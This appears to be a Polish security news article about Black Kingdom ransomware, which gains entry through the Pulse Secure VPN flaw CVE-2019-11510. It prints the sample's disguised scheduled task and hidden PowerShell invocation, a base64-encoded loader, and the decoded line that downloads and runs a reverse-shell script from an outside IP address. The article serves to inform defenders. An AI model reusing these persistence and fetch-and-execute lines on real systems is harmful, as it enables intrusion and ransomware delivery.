Odkrycie polskich ekspertów nowego ransomware przypomina o wielowektorowym zabezpieczaniu systemów i oprogramowania

17 czerwca, 2020

Polska firma RedTeam.pl, świadcząca usługi cybernetyczne, opublikowała informacje na temat nowego wariantu ransomware o nazwie Black Kingdom. Złośliwe oprogramowanie, zanim zaszyfruje pliki, uzyskuje dostęp do infrastruktury za pośrednictwem podatności w oprogramowaniu Pulse Secure VPN. Jest to dokładnie ta sama podatność (CVE-2019-11510), którą wykorzystywali przestępcy w atakach na organizacje z użyciem innych odmian ransomware: Maze oraz Sodinokibi / REvil ransomware.

Autor tej kampanii zaprogramował atak w taki sposób, aby ukrywać złośliwą aktywność w harmonogramie zadań pod nazwą „GoogleUpdateTaskMachineUSA”, które przypomina legalne zadanie przeglądarki Chrome, różniące się nieznacznie na końcu „UA” zamiast „USA”.

harmonogram zadan windows
Zdefiniowane zadanie w harmonogramie zadań.

Przy zdefiniowanym wyzwalaczu (np. po każdym uruchomieniu komputera) uruchamiany jest następujący kod:

<Exec>
<Command>powershell.exe</Command>
<Arguments>-windowstyle hidden -file'C:\ProgramData\Microsoft\Windows\Caches\cversions_cache.ps1'</Arguments>
</Exec>

Zawartość skryptu „cversions_cache.ps1” w powershell jest następująca:

$update = "SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAOQA4AC4AMQAzAC4ANAA5AC4AMQA3ADkALwByAGUAdgBlAHIAcwBlAC4AcABzADEAJwApAA=="
powershell.exe -exec bypass -nologo -Enc $update

Po zdekodowaniu można zaobserwować skąd pobierany jest końcowy skrypt:

IEX(New-Object Net.WebClient).DownloadString('hxxp://198.13.49.179/reverse.ps1')

Przy domyślnej ochronie Windows nie jest możliwe uruchamianie skryptów pobranych z sieci, dlatego prawdopodobnie ten sposób ataku zakończy się niepowodzeniem.

ransomware black kingdom
Próbka Black Kingdom przeanalizowana w usłudze online app.any.run.

Warto wspomnieć o ułomności systemu operacyjnego Windows, gdzie obejść politykę restrykcji PowerShell można na około 50 różnych sposobów. Mając taką wiedzę i dostępność do sieci można w systemie zrobić w zasadzie wszystko. Bez odpowiedniej ochrony da się uzyskać uprawnienia administratora domeny, dlatego standardowe zabezpieczenia Windows mogą być niewystarczające.

Firma świadcząca usługi VPN już w zeszłym roku zaktualizowała swoje oprogramowanie. Wygląda jedna na to, że niektóre organizacje wciąż nie załatały swoich systemów. Ponadto amerykańska agencja ds. bezpieczeństwa cybernetycznego (CISA) ostrzega, że załatanie dziurawego klienta VPN nie wystarczy, aby powstrzymać atakujących.

Picture of Adrian Ścibor

Adrian Ścibor

W ramach działań związanych z cyberbezpieczeństwem odpowiada w AVLab za przeprowadzanie testów rozwiązań ochronnych przed zagrożeniami. Opracowuje strategie oraz narzędzia, które pomagają w ochronie danych i systemów przed cyberatakami. Współuczestnik międzynarodowej grupy non-profit AMTSO, która zrzesza ekspertów IT.
Picture of Adrian Ścibor

Adrian Ścibor

W ramach działań związanych z cyberbezpieczeństwem odpowiada w AVLab za przeprowadzanie testów rozwiązań ochronnych przed zagrożeniami. Opracowuje strategie oraz narzędzia, które pomagają w ochronie danych i systemów przed cyberatakami. Współuczestnik międzynarodowej grupy non-profit AMTSO, która zrzesza ekspertów IT.

PODZIEL SIĘ:

guest
0 komentarzy
Inline Feedbacks
View all comments

Wyrażam zgodę na przesłanie oferty drogą telefoniczną przez IT Partners security sp. z o.o. z siedzibą Katowicach ul.Padereskiego 35 na podany przeze mnie adres e-mail zgodnie z ustawą z dnia 10 maja 2018 roku o ochronie danych osobowych (Dz. Ustaw z 2018, poz. 1000) oraz zgodnie z Rozporządzeniem Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (RODO).

Wyrażam zgodę na przesłanie oferty drogą mailową przez IT Partners security sp. z o.o. z siedzibą Katowicach ul.Padereskiego 35 na podany przeze mnie adres e-mail zgodnie z ustawą z dnia 10 maja 2018 roku o ochronie danych osobowych (Dz. Ustaw z 2018, poz. 1000) oraz zgodnie z Rozporządzeniem Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (RODO).

[ninja_tables id=”27481″]